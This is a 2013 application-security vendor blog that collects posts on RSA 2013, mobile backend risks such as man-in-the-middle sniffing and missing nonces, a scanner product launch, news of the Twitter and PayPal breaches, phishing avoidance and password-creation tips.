images-1

RSA 2013: Stay connected with the best talks, security news and giveaways!


RSA 2013 begins today. Whether you are or aren’t able to make the trip this year, there are more ways than ever to stay connected.

Our friends over at Checkmarx, created this great site, Where Alice Met Bob, which provides real time information on the best talks, latest relevant security news & cool vendor giveaways. The site has a bunch of fun features like a live video feed from the Checkmarx booth and a chance to register for a giveaway from Checkmarx. Register for a chance to win an RSA care package that includes vendor giveaways and cool prizes. Check it out! http://wherealicemetbob.com

images-1

Have you met Alice and Bob? Don’t worry, this isn’t a euphemism for something like “What Happens in Vegas stays in Vegas.” That would be Black Hat. Alice and Bob are just good old security lore dating back to 1978. Read RSA’s blog about Alice and Bob. http://blogs.rsa.com/alice-and-bob/

RSA lists a bunch of ways to stay to RSA connected through social media. http://www.rsaconference.com/events/2013/usa/for-sponsors-and-exhibitors/social-media.htm.

You can also stay connected through your favorite security tweets and blogs. We look forward to a great week! Connect with us @ntobjectives, @dan_kuykendall and @kdinerman.

We also just created a Facebook page. If you want to join us there, http://www.facebook.com/ntobjectives.

opendoor

Mobile application security: Lock the back door!

Mobile application security

I was excited when Sean Gallagher told he was writing about what we believe is one of the most important areas of application security risk today, mobile application security. In his recent article for Ars Technica, “Mobile Application Security: Always Keep the Back Door Locked” Gallagher outlines that its important to address mobile application security because many of the mobile applications we use today access backend middleware and corporate data sources. We have email applications, Twitter front end applications, even payment and banking applications. These mobile applications carry the same risks we have been fighting with web applications – they enable traffic to pass through normal corporate defenses like network firewalls.

Why mobile applications are vulnerable

There has been so much talk about device security, but most mobile applications make server side calls and that’s really the part that needs securing because server side compromise will impact more users and can expose sensitive and costly information.

And since mobile applications are new and businesses are rushing to get them out the door, all too often they are aren’t architected and configured with proper security and access controls leaving them vulnerable to attackers. As Gallagher put it, “Speed (to market) Kills.”

Are mobile application vulnerabilities new?

The reality is that the vulnerabilities that are showing up in mobile applications aren’t new at all. There are the same old vulnerabilities that we have been hunting for over 13 years now, SQL Injection, XSS and the like. In my recent post, I call it mobile application security Where’s Waldo of application security. Read that post for more info on why the vulnerabilities are as Gallagher puts it, Deja Vu.

How easy it is to attack mobile applications

Man in the middle attacks

It’s surprisingly easy to attack mobile applications. I have parked myself in the mall with my laptop and a Wi-Fi Pineapple. The Wifi Pineapple enables me to deliver real Internet access with me as a ‘man in middle.’ As people join my Wifi, I can watch the traffic coming from their smartphones without them knowing that their smartphone is connected to me. And when their applications get updates from a server, I see those updates. I can pull data from the sniffed traffic to do a man-in-the-middle attack if the application doesn’t have additional sorts of controls and protection, it could then be used to attack and access data in the backend systems.

Finding incomplete NONCE usage

Another technique I use, is looking for lack of, or ineffective use of a NONCE, a number used once. When building mobile apps, developers must use one time tokens. The client must have a special session token that is only used to create the NONCE. It looks at what its going to send in a string and calculates a special value that will only be valid for that request because it will be very difficult to re-create that key for another request. So, it is very hard to hack those kinds of apps.

For people building mobile applications, the NONCE technique is fairly well-known. Its a part of OAUTH which is becoming standard. It has become a part of identify management, but unfortunately not everyone is using it. In normal web use it wasn’t as critical because you have slightly more trust in the communication layer, but with mobile, you can’t trust it at all and use of the NONCE is critical.

I’m seeing many mobile applications that use a NONCE for one kind of request, but not for another. For example in the case of an application that might front-end Twitter, the developers might use a NONCE for sending Tweets, but they might not use a NONCE for reading messages. Since there isn’t a NONCE used for reading messages, I can leverage the man in the middle attack described above to sniff credentials for a user and then read private messages as that user.

In a way, its similar to CSRF. It’s like the mobile equivalent to anti-CSRF support. It basically prevent replay attacks for mobile backends.

Thanks again for the great article Sean and for raising awareness on this important issue. Since this article was published, we launched NTOSpider 6.0 which is capable of reading mobile traffic and testing it for vulnerabilities. NTOSpider 6.0 allows you to scan mobile application server side calls.

NTO Spider 6 – http://www.ntobjectives.com/security-software/ntospider-application-security-scanner/

Article: http://arstechnica.com/security/2013/02/mobile-app-security-always-keep-the-back-door-locked/

NTOSpider-Universal_Translator

Announcing NTOSpider 6 – Now scanning mobile, web services, and CSRF

I am very happy to announce the delivery of NTOSpider 6, the first and only dynamic application security scanner available that is capable of effectively testing modern mobile and web applications that leverage new technologies like REST, AJAX, JSON and GWT. NTOSpider delivers more comprehensive application coverage and sophisticated attack methodologies than any other solution available. Most importantly, NTOSpider delivers the best rates in the industry for the elimination of false positive and false negative findings.

NTOSpider-Universal_Translator

NTOSpider 6, a next generation dynamic application security testing (DAST) solution, that includes a proprietary Universal Translator technology that effectively translates these various formats so that it can automatically crawl, detect and attack vulnerabilities that exist in modern applications.

NTOSpider 6

  • More accurate (broader coverage of new technologies with fewer false positives and false negatives)
  • More automated (the most automated solution available with the most sophisticated attack technologies)
  • More cutting-edge (automates testing of new technologies used in HTML5, RIA and mobile apps)

Benefits of NTOSpider 6

  • Broader coverage of complex, modern applications with more automation and minimal per scan manpower
    • Mobile & Web Services – Enables simulated attacks of web & mobile back-end services by detecting rich client traffic to decode & attack popular formats: JSON, REST, Flash Remoting (AMF), SOAP, & XML
    • RIA – Dynamically crawls & attacks rich client traffic including AJAX, JQuery, GWT
  • Supports CSRF protected sites – token detection to enable collection & use of valid tokens during each attack
  • Increased level of automation – Execute repeatable, rapid & comprehensive automated application security testing
  • Reduces risk – Systematically reduce risk more effectively by leveraging a more automated process
  • Frees pen testers – Free pen testers to test the parts of the application that require manual testing like business logic

I’m on the phone with customers and security professionals every day who are struggling to keep up against rapidly proliferating applications and vulnerabilities. The spread of mobile applications, web services and complex Rich Internet Applications (RIA) has made a bad situation worse for security professionals, because the web application scanner industry has not kept pace to detect vulnerabilities in these new formats, security teams have been forced to test new applications manually which has become time consuming, a drain on resources and insufficient for understanding risk.

Rather than rely solely on manual testing for these technologies, security experts can leverage NTOSpider to automatically test more of their applications than ever before including the nine technologies we find to be the most common in today’s RIA, HTML5, Mobile and complex applications. Each are detailed in our recent white paper, which describes how and why these technologies create challenges for web scanners and provides step-by-step instructions for how security professionals can determine if their scanners are effectively scanning and attacking these newer technologies.

I invite security researchers and experts who want to stay current against modern applications and try the most accurate and automated solution available to request a free trial of NTOSpider 6!

Read the press release on NTOSpider 6.

ruby on rails

Surviving the Week 2/1/13 – Ruby on Rails – JSON Parser Vulnerability

Ruby on Rails – JSON Parser Vulnerability

ruby on rails

The JSON parser which converts JSON into YAML and in turn hands over to the YAML parser is buggy. The fix delivered replaces the YAML backend (yaml.rb) which was allowing foo strings. This is far too similar to the previous vulnerabilities for the 156 bug, meaning far more exploits in the wild. http://viamsec.com/blog/2013/01/ruby-on-rails-json-parser-vulnerability/

XSS Attacks Spike in Q4 2012

FireHost, a secure cloud hosting company, released statistics on Q4 2012 Web application attacks last week. The attack details both the type and number of attacks hitting its servers in the U.S. and Europe between October and December 2012.

Firehost reports statistics like these quarterly with a focus on what they call “The Superfecta.” The Superfecta are the four most dangerous cyber attacks:

Firehost reported that Cross-Site Scripting and SQL Injection attacks became more prevalent since the third quarter of 2012 with Cross-Site Scripting (XSS) leading the way in terms of attack types

http://www.securityweek.com/xss-attacks-spike-q4-2012-firehost

Test your application with NTOSpider to find out all possible vulnerabilities. NTOSpider produces separate report for XSS that enables you to drill into the report and reproduce the vulnerability.

Unicode Security Testing Library

Chris Weber announced on his blog last week that he has released a small utility library, unicode-hax that is now available on Github.  When it comes to testing string input to find bugs, or vulnerabilities, Unicode can be a tester’s best friend.  Strings are not simple things for software engineers – they require a lot of planning – buffers, encodings, transmission, and storage are just a few concerns. Chris wanted to answer some of the common questions people ask like:

  • What characters should I use for testing?
  • Which ones flip text around?
  • Which ones cause problems?
  • Which one maps to an apostrophe for SQL injection, or a less-than sign for XSS?

As Chris said, “Happy Bug Hunting!”

http://web.lookout.net/2013/01/unicode-security-testing-library.html

To avoid pain of these permutations, use NTOSpider. NTOSpider will fuzz the application not only with Unicode characters but several other encoding as well.

Multiple Vulnerabilities

CurvyCorners Cross Site Scripting – http://packetstormsecurity.com/files/119814
gpEasy 3.5.2 Cross Site Scripting – http://packetstormsecurity.com/files/119805
ImageCMS 4.0.0b SQL Injection – http://packetstormsecurity.com/files/119806
SonicWALL GMS 6 Arbitrary File Upload – http://packetstormsecurity.com/files/119808
Kohana Framework 2.3.3 Directory Traversal – http://packetstormsecurity.com/files/119870

twitter symbol

Tweet that, Twitter Hack: Potentially 250,000 users compromised

twitter symbolLast week, hackers gained access to Twitter’s internal systems and stole information, compromising 250,000 accounts. In a blog post, on Friday, Twitter announced that they had recorded some unusual access patterns that was identified as unauthorized access attempts to Twitter user data. Twitter reportedly shut down the attack quickly, but revealed that the attackers gained access to a limited set of user information like usernames, email addresses, session tokens and encrypted/salted versions of passwords.

The following is an image from Twitter’s Blog and @boblord about this matter:

Keeping Our Users Secure

 Is this the work of Chinese Hackers?

The online attack comes on the heels of recent hacks into the computer systems of US media and technology companies, including The New York Times and The Wall Street Journal. Both American newspapers reported that their computer systems had been infiltrated by China-based hackers. While articles and blogs are speculating that the Twitter attack may have been related to other recent attacks by China-based hackers, Twitter did not state this directly. They did, however reference the recent attacks against the New York Times and The Wall Street Journal. PCMag published a slide show on 10 Targets Hit by Chinese Hackers.

According to @boblord, “This attack was not the work of amateurs, and we do not believe it was an isolated incident. The attackers were extremely sophisticated, and we believe other companies and organizations have also been recently similarly attacked. For that reason we felt that it was important to publicize this attack while we still gather information, and we are helping government and federal law enforcement in their effort to find and prosecute these attackers to make the Internet safer for all users.”

Twitter protecting its users

Twitter has reset the passwords and revoked their session tokens of the impacted accounts. Lord urges all users to use good password hygiene across the internet and reset Twitter passwords as well.

Good password hygiene

  • At least 10 characters
  • Mixture of upper, lower case, symbols and numbers
  • Only use each password for one site

For more information on good password hygiene, read Dan’s advice for creating strong passwords.

Twitter did not specify the method hackers used to penetrate its system, but mentioned vulnerabilities related to Java in Safari and Firefox, and echoed Homeland Security’s advisory that users disable Java in their browsers.

Update:
Some media portals also relate this attack to Hacktivist Anonymous Group incorrectly, Twitter itself nowhere mention anything about who is attacker.

paypal sqli

PayPal plugs SQL Injection Hole

An Indian researcher, Prakhar Prasad found a Blind SQL Injection vulnerability in the Paypal Notifications (https://www.paypal-notify.com) application as part of a bug bounty program. The bug enabled him to access the Paypal Notifications system database. The Paypal team patched the vulnerability immediately due to the severity of the issue. The Register reports that the flaw was found in the module that sends an email confirming the email address of the account holder. Ultimately, this vulnerability could have enabled attackers to steal sensitive information from PayPal’s databases.

paypal sqli

This image shows the database name after the injection.

Screenshot from 2013-01-30 00-41-38

The blind SQL injection vulnerability that was detected existed in the official PayPal e-commerce website application, specifically in the email confirmation module. The vulnerability allowed remote attackers or a local low-privileged application user account to inject or execute (blind) SQL commands on the affected application databases.

There are frequent research reports in the news showing that SQL Injection remains one of the most prevalent vulnerabilities exploited by hackers. In at least one report, SQL Injection was tied for first place with DDOS attacks.

SQL Injection free tool

There are many free tools and cheat sheets that help people understand what SQL Injection is and how to test for it. SQL Invader is a free tool that automates the exploit of a SQL Injection vuln once you find it and makes it easy to present it to your team or CEO. Visit NT OBJECTives’ website to download it by completing a short form.

SQL Injection cheat sheet

In addition, there is a one page SQL Injection cheat sheet that lists the five most popular databases with their default admin credentials. Visit NT OBJECTives’ website to download it by completing a short form.

SQLInvader: http://www.ntobjectives.com/go/nto-sql-invader-free-download/
SQL Injection cheat sheet: http://www.ntobjectives.com/go/sql-injection-cheat-sheet/

Did Twitter set users up for future phishing attacks?

On the morning of the Twitter attack, I received this email:

twitteremail

On one hand, I appreciate that Twitter was up front with their users, but it also bothers me when companies make use of bad practices to solve a security problem.

What Twitter did wrong

The email encourages me to click on a link to fix the problem. Bad bad bad! They should simply have told me to visit twitter.com (unlinked) and instruct me to login so that their system can direct me through the process of creating a new password. Yes, in most cases security poses some inconvenience. Users would prefer a direct link just like we would all like to eat cookies for breakfast.

Because of the way Twitter did this, it will be much easier for a future phishing attack to succeed. This is because:

  • The bad guys are now armed with the exact template they can use in their phishing attack
  • Users will more easily accept this as the behavior of twitter if there is a security breach

Protect yourself from a phishing attack

Even with the best of intentions, companies will continue to use these bad solutions, which  means you must use your own best practices to protect yourself. Here are some simple recommendations to avoid phishing attacks:

  • Be suspicious of any link your email, and try to avoid clicking on links in emails
  • If you think the link is valid, its best to cut & paste the link and examine it first before putting it in your browser.
    • Verify the domain is correct. If the site was going to twiiter.com (notice the two i’s) and be very very suspicious!
  • Try just visiting the site directly to see if you can resolve the problem. This is what I did for the twitter incident and it worked perfectly.

Additionally you should be using different complex passwords for each site (see our tips for creating secure passwords) and always approach your use of the internet with caution and the assumption that you are a target of the bad guys.

passwords

Techniques for creating secure passwords

Most people are starting to realize that they need to start using more complex passwords, but generally believe:

complex password = hard to remember

This is not true. The solution I have been using for the last several years makes it easy to remember complex passwords, and even fun! Yeah, I really said fun ;)

passwords

Industry guidelines for secure passwords

From the FTC

  • Don’t use your name or birthdate — try to be unpredictable
  • Make your password at least 10 to 12 characters long, and use a mix of letters, numbers, and special characters
  • Don’t use the same password for multiple accounts
  • Keep your passwords in a secure place, and don’t share them with anyone — especially over the phone, in texts, or by email

Microsoft requires password have at least 3 of the following 5

  • Uppercase characters of European languages (A through Z, with diacritic marks, Greek and Cyrillic characters)
  • Lowercase characters of European languages (a through z, sharp-s, with diacritic marks, Greek and Cyrillic characters)
  • Base 10 digits (0 through 9)
  • Nonalphanumeric characters: ~!@#$%^&*_-+=`|\(){}[]:;”‘<>,.?/
  • Any Unicode character that is categorized as an alphabetic character but is not uppercase or lowercase. This includes Unicode characters from Asian languages.

 Our recommended password creation technique

One of the best ways to create a complex password that is easy to remember is to use a mnemonic or phrased based technique. The one I like the best is to come up with a phrase that would be easy to remember. Something personal to you is best. We will use this phrase as an example: “Dan has the best password advice I have ever seen.”

Then take the first letter of each word in the phrase. For some of the letters you will use upper-case version, and some letters can be switched with a number that matches (eg. 3 for e, 1 for i). The resulting password would be: dHtbBp@!h3s

Works like this:

  • d – Dan
  • H – has
  • t – the
  • b – best
  • p – password
  • @ – Advice
  • ! – I
  • h – have
  • 3 – ever
  • s – seen

You can then customize this based on the website or service your using at the time. For example, if your creating a password for twitter you might pick a phrase such as “I still don’t know why I waste my time on Twitter” which could give you the password of !sdky1WmtoT. Now we are having fun!

Password Managers

I also find that password managers can be a great help. I haven’t studied each well enough to give recommendations, but I personally use Password Safe (pwsafe.org) because I the pwsafe format is supported on many platforms and is generally easy to use.

Mobile App Security – Application Security’s “Where’s Waldo”

As I have discussed in previous posts and at conferences, like OWASP AppSecUSA, while the number of attacks continue to increase, the attack techniques aren’t new at all. They are actually the same old attacks like SQL Injection showing up in new places including mobile application services and AJAX applications. Because these newer technologies have exploded in popularity and become more mainstream, we keep seeing these same old vulnerabilities popping up in new places. I always say its like Where’s Waldo, and we simply need to understand the new landscape and start looking for Waldo again.

Waldo-image_approved

Over the last several years, there has been a major evolution in how applications are being built with new underlying technologies, application architectures and data formats, but have application scanners evolved with them? These new technologies have grown at such a fast rate, we haven’t been able to keep up at either end. On one end, developers aren’t able to build these new applications securely because they are up against deadlines from the business and delivering on new technologies. And on the other end, web application scanners  were architected in the golden days of web application security when almost all web applications were static and relatively simple HTML pages. While scanners have never and will never cover all types of every web application, our belief is that they can and should cover as much as possible. Unfortunately, most application security scanners haven’t kept pace with the changing applications.

Slide1

Over the next few weeks, I’ll be posting a series on these technologies and how developers, security professionals and application scanning vendors can help to close the coverage gap detailed above to improve both the efficiency (reduce manual efforts) and effectiveness (find more vulnerabilities) of security efforts.

By the way, a new beta version of our NTOSpider product is currently available. We believe its the only scanner that truly begins to address these newer technologies and formats like AMF, JSON and REST. But feel free to check it out for yourself. We welcome input and feedback.

In this series of posts, I’ll detail the technologies used in modern applications and demonstrate why they create challenges for modern web scanners. In addition, I’ll give you pointers on how you can determine if your application security scanners are effectively scanning and attacking these newer technologies.

We will discuss the following kinds of applications and technologies:

1. RIA & HTML5

  • AJAX applications: JSON (JQuery), REST, GWT (Google WebToolkit) ∙ Flash remoting: AMF
  • HTML5 applications (addressed in subsequent paper)

2. Mobile

  • Backends powered by JSON, REST and other custom formats

3. Web services

  • JSON, REST
  • XML-RPC, SOAP (addressed in subsequent paper)

4. Challenging application workflows

  • Sequences: Shopping Cart and other strict processes ∙ XSRF/CSRF Tokens

If you would like to read the full whitepaper on this topic, you can download it here.